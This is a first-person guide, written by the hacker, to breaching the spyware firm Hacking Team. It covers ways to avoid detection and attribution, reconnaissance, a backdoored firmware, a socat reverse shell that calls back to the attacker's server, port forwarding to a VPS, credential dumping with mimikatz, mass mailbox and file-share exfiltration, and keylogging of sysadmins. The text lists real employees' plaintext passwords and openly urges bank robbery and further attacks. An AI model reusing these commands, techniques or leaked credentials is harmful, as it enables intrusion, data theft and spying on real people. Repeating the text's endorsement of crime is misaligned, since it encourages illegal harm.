--[ 1 - Introduction ]----------------------------------------------------------
You'll notice the change in language since the last edition [1]. The
English-speaking world already has tons of books, talks, guides, and
info about hacking. In that world, there's plenty of hackers better than me,
but they misuse their talents working for "defense" contractors, for intelligence
agencies, to protect banks and corporations, and to defend the status quo.
Hacker culture was born in the US as a counterculture, but that origin only
remains in its aesthetics - the rest has been assimilated. At least they can
wear a t-shirt, dye their hair blue, use their hacker names, and feel like
rebels while they work for the Man.
You used to have to sneak into offices to leak documents [2]. You used to need
a gun to rob a bank. Now you can do both from bed with a laptop in hand [3][4].
Like the CNT said after the Gamma Group hack: "Let's take a step forward with
new forms of struggle" [5]. Hacking is a powerful tool, let's learn and fight!
[1] http://pastebin.com/raw.php?i=cRYvK4jb
[2] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI
[3] http://www.aljazeera.com/news/2015/09/algerian-hacker-hero-hoodlum-150921083914167.html
[4] https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf
[5] http://madrid.cnt.es/noticia/consideraciones-sobre-el-ataque-informatico-a-gamma-group
--[ 2 - Hacking Team ]----------------------------------------------------------
Hacking Team was a company that helped governments hack and spy on
journalists, activists, political opposition, and other threats to their power
[1][2][3][4][5][6][7][8][9][10][11]. And, occasionally, on actual criminals
and terrorists [12]. Vincenzetti, the CEO, liked to end his emails with the
fascist slogan "boia chi molla". It'd be more correct to say "boia chi vende
RCS". They also claimed to have technology to solve the "problem" posed by Tor
and the darknet [13]. But seeing as I'm still free, I have my doubts about
its effectiveness.
[1] http://www.animalpolitico.com/2015/07/el-gobierno-de-puebla-uso-el-software-de-hacking-team-para-espionaje-politico/
[2] http://www.prensa.com/politica/claves-entender-Hacking-Team-Panama_0_4251324994.html
[3] http://www.24-horas.mx/ecuador-espio-con-hacking-team-a-opositor-carlos-figueroa/
[4] https://citizenlab.org/2012/10/backdoors-are-forever-hacking-team-and-the-targeting-of-dissent/
[5] https://citizenlab.org/2014/02/hacking-team-targeting-ethiopian-journalists/
[6] https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/
[7] http://focusecuador.net/2015/07/08/hacking-team-rodas-paez-tiban-torres-son-espiados-en-ecuador/
[8] http://www.pri.org/stories/2015-07-08/these-ethiopian-journalists-exile-hacking-team-revelations-are-personal
[9] https://theintercept.com/2015/07/07/leaked-documents-confirm-hacking-team-sells-spyware-repressive-countries/
[10] http://www.wired.com/2013/06/spy-tool-sold-to-governments/
[11] http://www.theregister.co.uk/2015/07/13/hacking_team_vietnam_apt/
[12] http://www.ilmessaggero.it/primopiano/cronaca/yara_bossetti_hacking_team-1588888.html
[13] http://motherboard.vice.com/en_ca/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web
--[ 3 - Stay safe out there ]---------------------------------------------------
Unfortunately, our world is backwards. You get rich by doing bad things and go
to jail for doing good. Fortunately, thanks to the hard work of people like
the Tor project [1], you can avoid going to jail by taking a few simple
precautions:
1) Encrypt your hard disk [2]
I guess when the police arrive to seize your computer, it means you've
already made a lot of mistakes, but it's better to be safe.
2) Use a virtual machine with all traffic routed through Tor
This accomplishes two things. First, all your traffic is anonymized through
Tor. Second, keeping your personal life and your hacking on separate
computers helps you not to mix them by accident.
You can use projects like Whonix [3], Tails [4], Qubes TorVM [5], or
something custom [6]. Here's [7] a detailed comparison.
3) (Optional) Don't connect directly to Tor
Tor isn't a panacea. They can correlate the times you're connected to Tor
with the times your hacker handle is active. Also, there have been
successful attacks against Tor [8]. You can connect to Tor using other
peoples' wifi. Wifislax [9] is a linux distro with a lot of tools for
cracking wifi. Another option is to connect to a VPN or a bridge node [10]
before Tor, but that's less secure because they can still correlate the
hacker's activity with your house's internet activity (this was used as
evidence against Jeremy Hammond [11]).
The reality is that while Tor isn't perfect, it works quite well. When I
was young and reckless, I did plenty of stuff without any protection (I'm
referring to hacking) apart from Tor, that the police tried their hardest
to investigate, and I've never had any problems.
[1] https://www.torproject.org/
[2] https://info.securityinabox.org/es/chapter-4
[3] https://www.whonix.org/
[4] https://tails.boum.org/
[5] https://www.qubes-os.org/doc/privacy/torvm/
[6] https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy
[7] https://www.whonix.org/wiki/Comparison_with_Others
[8] https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack/
[9] http://www.wifislax.com/
[10] https://www.torproject.org/docs/bridges.html.en
[11] http://www.documentcloud.org/documents/1342115-timeline-correlation-jeremy-hammond-and-anarchaos.html
----[ 3.1 - Infrastructure ]----------------------------------------------------
I don't hack directly from Tor exit nodes. They're on blacklists, they're
slow, and they can't receive connect-backs. Tor protects my anonymity while I
connect to the infrastructure I use to hack, which consists of:
1) Domain Names
For C&C addresses, and for DNS tunnels for guaranteed egress.
2) Stable Servers
For use as C&C servers, to receive connect-back shells, to launch attacks,
and to store the loot.
3) Hacked Servers
For use as pivots to hide the IP addresses of the stable servers. And for
when I want a fast connection without pivoting, for example to scan ports,
scan the whole internet, download a database with sqli, etc.
Obviously, you have to use an anonymous payment method, like bitcoin (if it's
used carefully).
----[ 3.2 - Attribution ]-------------------------------------------------------
In the news we often see attacks traced back to government-backed hacking
groups ("APTs"), because they repeatedly use the same tools, leave the same
footprints, and even use the same infrastructure (domains, emails, etc).
They're negligent because they can hack without legal consequences.
I didn't want to make the police's work any easier by relating my hack of
Hacking Team with other hacks I've done or with names I use in my day-to-day
work as a blackhat hacker. So, I used new servers and domain names, registered
with new emails, and payed for with new bitcoin addresses. Also, I only used
tools that are publicly available, or things that I wrote specifically for
this attack, and I changed my way of doing some things to not leave my usual
forensic footprint.
--[ 4 - Information Gathering ]-------------------------------------------------
Although it can be tedious, this stage is very important, since the larger the
attack surface, the easier it is to find a hole somewhere in it.
----[ 4.1 - Technical Information ]---------------------------------------------
Some tools and techniques are:
1) Google
A lot of interesting things can be found with a few well-chosen search
queries. For example, the identity of DPR [1]. The bible of Google hacking
is the book "Google Hacking for Penetration Testers". You can find a short
summary in Spanish at [2].
2) Subdomain Enumeration
Often, a company's main website is hosted by a third party, and you'll find
the company's actual IP range thanks to subdomains like mx.company.com or
ns1.company.com. Also, sometimes there are things that shouldn't be exposed
in "hidden" subdomains. Useful tools for discovering domains and subdomains
are fierce [3], theHarvester [4], and recon-ng [5].
3) Whois lookups and reverse lookups
With a reverse lookup using the whois information from a domain or IP range
of a company, you can find other domains and IP ranges. As far as I know,
there's no free way to do reverse lookups aside from a google "hack":
"via della moscova 13" site:www.findip-address.com
"via della moscova 13" site:domaintools.com
4) Port scanning and fingerprinting
Unlike the other techniques, this talks to the company's servers. I
include it in this section because it's not an attack, it's just
information gathering. The company's IDS might generate an alert, but you
don't have to worry since the whole internet is being scanned constantly.
For scanning, nmap [6] is precise, and can fingerprint the majority of
services discovered. For companies with very large IP ranges, zmap [7] or
masscan [8] are fast. WhatWeb [9] or BlindElephant [10] can fingerprint web
sites.
[1] http://www.nytimes.com/2015/12/27/business/dealbook/the-unsung-tax-agent-who-put-a-face-on-the-silk-road.html
[2] http://web.archive.org/web/20140610083726/http://www.soulblack.com.ar/repo/papers/hackeando_con_google.pdf
[3] http://ha.ckers.org/fierce/
[4] https://github.com/laramies/theHarvester
[5] https://bitbucket.org/LaNMaSteR53/recon-ng
[6] https://nmap.org/
[7] https://zmap.io/
[8] https://github.com/robertdavidgraham/masscan
[9] http://www.morningstarsecurity.com/research/whatweb
[10] http://blindelephant.sourceforge.net/
----[ 4.2 - Social Information ]------------------------------------------------
For social engineering, it's useful to have information about the employees,
their roles, contact information, operating system, browser, plugins,
software, etc. Some resources are:
1) Google
Here as well, it's the most useful tool.
2) theHarvester and recon-ng
I already mentioned them in the previous section, but they have a lot more
functionality. They can find a lot of information quickly and
automatically. It's worth reading all their documentation.
3) LinkedIn
A lot of information about the employees can be found here. The company's
recruiters are the most likely to accept your connection requests.
4) Data.com
Previously known as jigsaw. They have contact information for many
employees.
5) File Metadata
A lot of information about employees and their systems can be found in
metadata of files the company has published. Useful tools for finding
files on the company's website and extracting the metadata are metagoofil
[1] and FOCA [2].
[1] https://github.com/laramies/metagoofil
[2] https://www.elevenpaths.com/es/labstools/foca-2/index.html
--[ 5 - Entering the network ]--------------------------------------------------
There are various ways to get a foothold. Since the method I used against
Hacking Team is uncommon and a lot more work than is usually necessary, I'll
talk a little about the two most common ways, which I recommend trying first.
----[ 5.1 - Social Engineering ]------------------------------------------------
Social engineering, specifically spear phishing, is responsible for the
majority of hacks these days. For an introduction in Spanish, see [1]. For
more information in English, see [2] (the third part, "Targeted Attacks"). For
fun stories about the social engineering exploits of past generations, see
[3]. I didn't want to try to spear phish Hacking Team, as their whole business
is helping governments spear phish their opponents, so they'd be much more
likely to recognize and investigate a spear phishing attempt.
[1] http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html
[2] http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/
[3] http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf
----[ 5.2 - Buying Access ]-----------------------------------------------------
Thanks to hardworking Russians and their exploit kits, traffic sellers, and
bot herders, many companies already have compromised computers in their
networks. Almost all of the Fortune 500, with their huge networks, have some
bots already inside. However, Hacking Team is a very small company, and most
of it's employees are infosec experts, so there was a low chance that they'd
already been compromised.
----[ 5.3 - Technical Exploitation ]--------------------------------------------
After the Gamma Group hack, I described a process for searching for
vulnerabilities [1]. Hacking Team had one public IP range:
inetnum: 93.62.139.32 - 93.62.139.47
descr: HT public subnet
Hacking Team had very little exposed to the internet. For example, unlike
Gamma Group, their customer support site needed a client certificate to
connect. What they had was their main website (a Joomla blog in which Joomscan
[2] didn't find anything serious), a mail server, a couple routers, two VPN
appliances, and a spam filtering appliance. So, I had three options: look for
a 0day in Joomla, look for a 0day in postfix, or look for a 0day in one of the
embedded devices. A 0day in an embedded device seemed like the easiest option,
and after two weeks of work reverse engineering, I got a remote root exploit.
Since the vulnerabilities still haven't been patched, I won't give more
details, but for more information on finding these kinds of vulnerabilities,
see [3] and [4].
[1] http://pastebin.com/raw.php?i=cRYvK4jb
[2] http://sourceforge.net/projects/joomscan/
[3] http://www.devttys0.com/
[4] https://docs.google.com/presentation/d/1-mtBSka1ktdh8RHxo2Ft0oNNlIp7WmDA2z9zzHpon8A
--[ 6 - Be Prepared ]-----------------------------------------------------------
I did a lot of work and testing before using the exploit against Hacking Team.
I wrote a backdoored firmware, and compiled various post-exploitation tools
for the embedded device. The backdoor serves to protect the exploit. Using the
exploit just once and then returning through the backdoor makes it harder to
identify and patch the vulnerabilities.
The post-exploitation tools that I'd prepared were:
1) busybox
For all the standard Unix utilities that the system didn't have.
2) nmap
To scan and fingerprint Hacking Team's internal network.
3) Responder.py
The most useful tool for attacking windows networks when you have access to
the internal network, but no domain user.
4) Python
To execute Responder.py
5) tcpdump
For sniffing traffic.
6) dsniff
For sniffing passwords from plaintext protocols like ftp, and for
arpspoofing. I wanted to use ettercap, written by Hacking Team's own ALoR
and NaGA, but it was hard to compile it for the system.
7) socat
For a comfortable shell with a pty:
my_server: socat file:`tty`,raw,echo=0 tcp-listen:my_port
hacked box: socat exec:'bash -li',pty,stderr,setsid,sigint,sane \
tcp:my_server:my_port
And useful for a lot more, it's a networking swiss army knife. See the
examples section of its documentation.
8) screen
Like the shell with pty, it wasn't really necessary, but I wanted to feel
at home in Hacking Team's network.
9) a SOCKS proxy server
To use with proxychains to be able to access their local network from any
program.
10) tgcd
For forwarding ports, like for the SOCKS server, through the firewall.
[1] https://www.busybox.net/
[2] https://nmap.org/
[3] https://github.com/SpiderLabs/Responder
[4] https://github.com/bendmorris/static-python
[5] http://www.tcpdump.org/
[6] http://www.monkey.org/~dugsong/dsniff/
[7] http://www.dest-unreach.org/socat/
[8] https://www.gnu.org/software/screen/
[9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html
[10] http://tgcd.sourceforge.net/
The worst thing that could happen would be for my backdoor or post-exploitation
tools to make the system unstable and cause an employee to investigate. So I
spent a week testing my exploit, backdoor, and post-exploitation tools in the
networks of other vulnerable companies before entering Hacking Team's network.
--[ 7 - Watch and Listen ]------------------------------------------------------
Now inside their internal network, I wanted to take a look around and think
about my next step. I started Responder.py in analysis mode (-A to listen
without sending poisoned responses), and did a slow scan with nmap.
--[ 8 - NoSQL Databases ]-------------------------------------------------------
NoSQL, or rather NoAuthentication, has been a huge gift to the hacker
community [1]. Just when I was worried that they'd finally patched all of the
authentication bypass bugs in MySQL [2][3][4][5], new databases came into
style that lack authentication by design. Nmap found a few in Hacking Team's
internal network:
27017/tcp open mongodb MongoDB 2.6.5
| mongodb-databases:
| ok = 1
| totalSizeMb = 47547
| totalSize = 49856643072
...
|_ version = 2.6.5
27017/tcp open mongodb MongoDB 2.6.5
| mongodb-databases:
| ok = 1
| totalSizeMb = 31987
| totalSize = 33540800512
| databases
...
|_ version = 2.6.5
They were the databases for test instances of RCS. The audio that RCS records
is stored in MongoDB with GridFS. The audio folder in the torrent [6] came
from this. They were spying on themselves without meaning to.
[1] https://www.shodan.io/search?query=product%3Amongodb
[2] https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
[3] http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0001.html
[4] http://downloads.securityfocus.com/vulnerabilities/exploits/hoagie_mysql.c
[5] http://archives.neohapsis.com/archives/bugtraq/2000-02/0053.html
[6] https://ht.transparencytoolkit.org/audio/
--[ 9 - Crossed Cables ]--------------------------------------------------------
Although it was fun to listen to recordings and see webcam images of Hacking
Team developing their malware, it wasn't very useful. Their insecure backups
were the vulnerability that opened their doors. According to their
documentation [1], their iSCSI devices were supposed to be on a separate
network, but nmap found a few in their subnetwork 192.168.1.200/24:
Nmap scan report for ht-synology.hackingteam.local (192.168.200.66)
...
3260/tcp open iscsi?
| iscsi-info:
| Target: iqn.2000-01.com.synology:ht-synology.name
| Address: 192.168.200.66:3260,0
|_ Authentication: No authentication required
Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)
...
3260/tcp open iscsi?
| iscsi-info:
| Target: iqn.2000-01.com.synology:synology-backup.name
| Address: 10.0.1.72:3260,0
| Address: 192.168.200.72:3260,0
|_ Authentication: No authentication required
iSCSI needs a kernel module, and it would've been difficult to compile it for
the embedded system. I forwarded the port so that I could mount it from a VPS:
VPS: tgcd -L -p 3260 -q 42838
Embedded system: tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838
VPS: iscsiadm -m discovery -t sendtargets -p 127.0.0.1
Now iSCSI finds the name iqn.2000-01.com.synology but has problems mounting it
because it thinks its IP is 192.168.200.72 instead of 127.0.0.1
The way I solved it was:
iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT --to-destination 127.0.0.1
And now, after:
iscsiadm -m node --targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 --login
...the device file appears! We mount it:
vmfs-fuse -o ro /dev/sdb1 /mnt/tmp
and find backups of various virtual machines. The Exchange server seemed like
the most interesting. It was too big too download, but it was possible to
mount it remotely to look for interesting files:
$ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk
$ fdisk -l /dev/loop0
/dev/loop0p1 2048 1258287103 629142528 7 HPFS/NTFS/exFAT
so the offset is 2048 * 512 = 1048576
$ losetup -o 1048576 /dev/loop1 /dev/loop0
$ mount -o ro /dev/loop1 /mnt/exchange/
now in /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311
we find the hard disk of the VM, and mount it:
vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/
mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1
...and finally we've unpacked the Russian doll and can see all the files from
the old Exchange server in /mnt/part1
[1] https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/InfrastrutturaIT/Rete/infrastruttura%20ht.pdf
--[ 10 - From backups to domain admin ]-----------------------------------------
What interested me most in the backup was seeing if it had a password or hash
that could be used to access the live server. I used pwdump, cachedump, and
lsadump [1] on the registry hives. lsadump found the password to the besadmin
service account:
_SC_BlackBerry MDS Connection Service
0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 b.e.s.3.2.6.7.8.
0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00 !.!.!...........
I used proxychains [2] with the socks server on the embedded device and
smbclient [3] to check the password:
proxychains smbclient '//192.168.100.51/c$' -U 'hackingteam.local/besadmin%bes32678!!!'
It worked! The password for besadmin was still valid, and a local admin. I
used my proxy and metasploit's psexec_psh [4] to get a meterpreter session.
Then I migrated to a 64 bit process, ran "load kiwi" [5], "creds_wdigest", and
got a bunch of passwords, including the Domain Admin:
HACKINGTEAM BESAdmin bes32678!!!
HACKINGTEAM Administrator uu8dd8ndd12!
HACKINGTEAM c.pozzi P4ssword <---- lol great sysadmin
HACKINGTEAM m.romeo ioLK/(90
HACKINGTEAM l.guerra 4luc@=.=
HACKINGTEAM d.martinez W4tudul3sp
HACKINGTEAM g.russo GCBr0s0705!
HACKINGTEAM a.scarafile Cd4432996111
HACKINGTEAM r.viscardi Ht2015!
HACKINGTEAM a.mino A!e$$andra
HACKINGTEAM m.bettini Ettore&Bella0314
HACKINGTEAM m.luppi Blackou7
HACKINGTEAM s.gallucci 1S9i8m4o!
HACKINGTEAM d.milan set!dob66
HACKINGTEAM w.furlan Blu3.B3rry!
HACKINGTEAM d.romualdi Rd13136f@#
HACKINGTEAM l.invernizzi L0r3nz0123!
HACKINGTEAM e.ciceri 2O2571&2E
HACKINGTEAM e.rabe erab@4HT!
[1] https://github.com/Neohapsis/creddump7
[2] http://proxychains.sourceforge.net/
[3] https://www.samba.org/
[4] http://ns2.elhacker.net/timofonica/manuales/Manual_de_Metasploit_Unleashed.pdf
[5] https://github.com/gentilkiwi/mimikatz
--[ 11 - Downloading the mail ]-------------------------------------------------
With the Domain Admin password, I have access to the email, the heart of the
company. Since with each step I take there's a chance of being detected, I
start downloading their email before continuing to explore. Powershell makes
it easy [1]. Curiously, I found a bug with Powershell's date handling. After
downloading the emails, it took me another couple weeks to get access to the
source code and everything else, so I returned every now and then to download
the new emails. The server was Italian, with dates in the format
day/month/year. I used:
-ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')}
with New-MailboxExportRequest to download the new emails (in this case all
mail since June 5). The problem is it says the date is invalid if you
try a day larger than 12 (I imagine because in the US the month comes first
and you can't have a month above 12). It seems like Microsoft's engineers only
test their software with their own locale.
[1] http://www.stevieg.org/2010/07/using-the-exchange-2010-sp1-mailbox-export-features-for-mass-exports-to-pst/
--[ 12 - Downloading Files ]----------------------------------------------------
Now that I'd gotten Domain Admin, I started to download file shares using my
proxy and the -Tc option of smbclient, for example:
proxychains smbclient '//192.168.1.230/FAE DiskStation' \
-U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*'
I downloaded the Amministrazione, FAE DiskStation, and FileServer folders in
the torrent like that.
--[ 13 - Introduction to hacking windows domains ]------------------------------
Before continuing with the story of the "weones culiaos" (Hacking Team), I
should give some general knowledge for hacking windows networks.
----[ 13.1 - Lateral Movement ]-------------------------------------------------
I'll give a brief review of the different techniques for spreading withing a
windows network. The techniques for remote execution require the password or
hash of a local admin on the target. By far, the most common way of obtaining
those credentials is using mimikatz [1], especially sekurlsa::logonpasswords
and sekurlsa::msv, on the computers where you already have admin access. The
techniques for "in place" movement also require administrative privileges
(except for runas). The most important tools for privilege escalation are
PowerUp [2], and bypassuac [3].
[1] https://adsecurity.org/?page_id=1821
[2] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp
[3] https://github.com/PowerShellEmpire/Empire/blob/master/data/module_source/privesc/Invoke-BypassUAC.ps1
Remote Movement:
1) psexec
The tried and true method for lateral movement on windows. You can use
psexec [1], winexe [2], metasploit's psexec_psh [3], Powershell Empire's
invoke_psexec [4], or the builtin windows command "sc" [5]. For the
metasploit module, powershell empire, and pth-winexe [6], you just need the
hash, not the password. It's the most universal method (it works on any
windows computer with port 445 open), but it's also the least stealthy.
Event type 7045 "Service Control Manager" will appear in the event logs. In
my experience, no one has ever noticed during a hack, but it helps the
investigators piece together what the hacker did afterwards.
2) WMI
The most stealthy method. The WMI service is enabled on all windows
computers, but except for servers, the firewall blocks it by default. You
can use wmiexec.py [7], pth-wmis [6] (here's a demonstration of wmiexec and
pth-wmis [8]), Powershell Empire's invoke_wmi [9], or the windows builtin
wmic [5]. All except wmic just need the hash.
3) PSRemoting [10]
It's disabled by default, and I don't recommend enabling new protocols.
But, if the sysadmin has already enabled it, it's very convenient,
especially if you use powershell for everything (and you should use
powershell for almost everything, it will change [11] with powershell 5 and
windows 10, but for now powershell makes it easy to do everything in RAM,
avoid AV, and leave a small footprint)
4) Scheduled Tasks
You can execute remote programs with at and schtasks [5]. It works in the
same situations where you could use psexec, and it also leaves a well known
footprint [12].
5) GPO
If all those protocols are disabled or blocked by the firewall, once you're
Domain Admin, you can use GPO to give users a login script, install an msi,
execute a scheduled task [13], or, like we'll see with the computer of
Mauro Romeo (one of Hacking Team's sysadmins), use GPO to enable WMI and
open the firewall.
[1] https://technet.microsoft.com/en-us/sysinternals/psexec.aspx
[2] https://sourceforge.net/projects/winexe/
[3] https://www.rapid7.com/db/modules/exploit/windows/smb/psexec_psh
[4] http://www.powershellempire.com/?page_id=523
[5] http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/
[6] https://github.com/byt3bl33d3r/pth-toolkit
[7] https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py
[8] https://www.trustedsec.com/june-2015/no_psexec_needed/
[9] http://www.powershellempire.com/?page_id=124
[10] http://www.maquinasvirtuales.eu/ejecucion-remota-con-powershell/
[11] https://adsecurity.org/?p=2277
[12] https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
[13] https://github.com/PowerShellEmpire/Empire/blob/master/lib/modules/lateral_movement/new_gpo_immediate_task.py
"In place" Movement:
1) Token Stealing
Once you have admin access on a computer, you can use the tokens of the
other users to access resources in the domain. Two tools for doing this are
incognito [1] and the mimikatz token::* commands [2].
2) MS14-068
You can take advantage of a validation bug in Kerberos to generate Domain
Admin tickets [3][4][5].
3) Pass the Hash
If you have a user's hash, but they're not logged in, you can use
sekurlsa::pth [2] to get a ticket for the user.
4) Process Injection
Any RAT can inject itself into other processes. For example, the migrate
command in meterpreter and pupy [6], or the psinject [7] command in
powershell empire. You can inject into the process that has the token you
want.
5) runas
This is sometimes very useful since it doesn't require admin privileges.
The command is part of windows, but if you don't have a GUI you can use
powershell [8].
[1] https://www.indetectables.net/viewtopic.php?p=211165
[2] https://adsecurity.org/?page_id=1821
[3] https://github.com/bidord/pykek
[4] https://adsecurity.org/?p=676
[5] http://www.hackplayers.com/2014/12/CVE-2014-6324-como-validarse-con-cualquier-usuario-como-admin.html
[6] https://github.com/n1nj4sec/pupy
[7] http://www.powershellempire.com/?page_id=273
[8] https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1
----[ 13.2 - Persistence ]------------------------------------------------------
Once you have access, you want to keep it. Really, persistence is only a
challenge for assholes like Hacking Team who target activists and other
individuals. To hack companies, persistence isn't needed since companies never
sleep. I always use Duqu 2 style "persistence", executing in RAM on a couple
high-uptime servers. On the off chance that they all reboot at the same time,
I have passwords and a golden ticket [1] as backup access. You can read more
about the different techniques for persistence in windows here [2][3][4]. But
for hacking companies, it's not needed and it increases the risk of detection.
[1] http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/
[2] http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/
[3] http://www.hexacorn.com/blog/category/autostart-persistence/
[4] https://blog.netspi.com/tag/persistence/
----[ 13.3 - Internal reconnaissance ]------------------------------------------
The best tool these days for understanding windows networks is Powerview [1].
It's worth reading everything written by it's author [2], especially [3], [4],
[5], and [6]. Powershell itself is also quite powerful [7]. As there are still
many windows 2000 and 2003 servers without powershell, you also have to learn
the old school [8], with programs like netview.exe [9] or the windows builtin
"net view". Other techniques that I like are:
1) Downloading a list of file names
With a Domain Admin account, you can download a list of all filenames in
the network with powerview:
Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ |
select-string '^(.*) \t-' | %{dir -recurse $_.Matches[0].Groups[1] |
select fullname | out-file -append files.txt}
Later, you can read it at your leisure and choose which files to download.
2) Reading email
As we've already seen, you can download email with powershell, and it has a
lot of useful information.
3) Reading sharepoint
It's another place where many businesses store a lot of important
information. It can also be downloaded with powershell [10].
4) Active Directory [11]
It has a lot of useful information about users and computers. Without being
Domain Admin, you can already get a lot of info with powerview and other
tools [12]. After getting Domain Admin, you should export all the AD
information with csvde or another tool.
5) Spy on the employees
One of my favorite hobbies is hunting sysadmins. Spying on Christian Pozzi
(one of Hacking Team's sysadmins) gave me access to a Nagios server which
gave me access to the rete sviluppo (development network with the source
code of RCS). With a simple combination of Get-Keystrokes and
Get-TimedScreenshot from PowerSploit [13], Do-Exfiltration from nishang
[14], and GPO, you can spy on any employee, or even on the whole domain.
[1] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
[2] http://www.harmj0y.net/blog/tag/powerview/
[3] http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/
[4] http://www.harmj0y.net/blog/redteaming/powerview-2-0/
[5] http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/
[6] http://www.slideshare.net/harmj0y/i-have-the-powerview
[7] https://adsecurity.org/?p=2535
[8] https://www.youtube.com/watch?v=rpwrKhgMd7E
[9] https://github.com/mubix/netview
[10] https://blogs.msdn.microsoft.com/rcormier/2013/03/30/how-to-perform-bulk-downloads-of-files-in-sharepoint/
[11] https://adsecurity.org/?page_id=41
[12] http://www.darkoperator.com/?tag=Active+Directory
[13] https://github.com/PowerShellMafia/PowerSploit
[14] https://github.com/samratashok/nishang
--[ 14 - Hunting Sysadmins ]----------------------------------------------------
Reading their documentation about their infrastructure [1], I saw that I was
still missing access to something important - the "Rete Sviluppo", an isolated
network with the source code for RCS. The sysadmins of a company always have
access to everything, so I searched the computers of Mauro Romeo and Christian
Pozzi to see how they administer the Sviluppo network, and to see if there
were any other interesting systems I should investigate. It was simple to
access their computers, since they were part of the windows domain where I'd
already gotten admin access. Mauro Romeo's computer didn't have any ports
open, so I opened the port for WMI [2] and executed meterpreter [3]. In
addition to keylogging and screen scraping with Get-Keystrokes and
Get-TimeScreenshot, I used many /gather/ modules from metasploit, CredMan.ps1
[4], and searched for interesting files [5]. Upon seeing that Pozzi had a
Truecrypt volume, I waited until he'd mounted it and then copied off the
files. Many have made fun of Christian Pozzi's weak passwords (and of
Christian Pozzi in general, he provides plenty of material [6][7][8][9]). I
included them in the leak as a false clue, and to laugh at him. The reality is
that mimikatz and keyloggers view all passwords equally.
[1] http://hacking.technology/Hacked%20Team/FileServer/FileServer/Hackingteam/InfrastrutturaIT/
[2] http://www.hammer-software.com/wmigphowto.shtml
[3] https://www.trustedsec.com/june-2015/no_psexec_needed/
[4] https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde
[5] http://pwnwiki.io/#!presence/windows/find_files.md
[6] http://archive.is/TbaPy
[7] http://hacking.technology/Hacked%20Team/c.pozzi/screenshots/
[8] http://hacking.technology/Hacked%20Team/c.pozzi/Desktop/you.txt
[9] http://hacking.technology/Hacked%20Team/c.pozzi/credentials/
--[ 15 - The bridge ]-----------------------------------------------------------
Within Christian Pozzi's Truecrypt volume, there was a textfile with many
passwords [1]. One of those was for a Fully Automated Nagios server, which had
access to the Sviluppo network in order to monitor it. I'd found the bridge I
needed. The textfile just had the password to the web interface, but there was
a public code execution exploit [2] (it's an unauthenticated exploit, but it
requires that at least one user has a session initiated, for which I used the
password from the textfile).
[1] http://hacking.technology/Hacked%20Team/c.pozzi/Truecrypt%20Volume/Login%20HT.txt
[2] http://seclists.org/fulldisclosure/2014/Oct/78
--[ 16 - Reusing and resetting passwords ]--------------------------------------
Reading the emails, I'd seen Daniele Milan granting access to git repos. I
already had his windows password thanks to mimikatz. I tried it on the git
server and it worked. Then I tried sudo and it worked. For the gitlab server
and their twitter account, I used the "forgot my password" function along with
my access to their mail server to reset the passwords.
--[ 17 - Conclusion ]-----------------------------------------------------------
That's all it takes to take down a company and stop their human rights abuses.
That's the beauty and asymmetry of hacking: with 100 hours of work, one person
can undo years of work by a multi-million dollar company. Hacking gives the
underdog a chance to fight and win.
Hacking guides often end with a disclaimer: this information is for
educational purposes only, be an ethical hacker, don't attack systems you
don't have permission to, etc. I'll say the same, but with a more rebellious
conception of "ethical" hacking. Leaking documents, expropriating money from
banks, and working to secure the computers of ordinary people is ethical
hacking. However, most people that call themselves "ethical hackers" just work
to secure those who pay their high consulting fees, who are often those most
deserving to be hacked.
Hacking Team saw themselves as part of a long line of inspired Italian design
[1]. I see Vincenzetti, his company, his cronies in the police, Carabinieri,
and government, as part of a long tradition of Italian fascism. I'd like to
dedicate this guide to the victims of the raid on the Armando Diaz school, and
to all those who have had their blood spilled by Italian fascists.
[1] https://twitter.com/coracurrier/status/618104723263090688
--[ 18 - Contact ]--------------------------------------------------------------
To send me spear phishing attempts, death threats in Italian [1][2], and to
give me 0days or access inside banks, corporations, governments, etc.
[1] http://andres.delgado.ec/2016/01/15/el-miedo-de-vigilar-a-los-vigilantes/
[2] https://twitter.com/CthulhuSec/status/619459002854977537
only encrypted email please:
https://securityinabox.org/es/thunderbird_usarenigmail
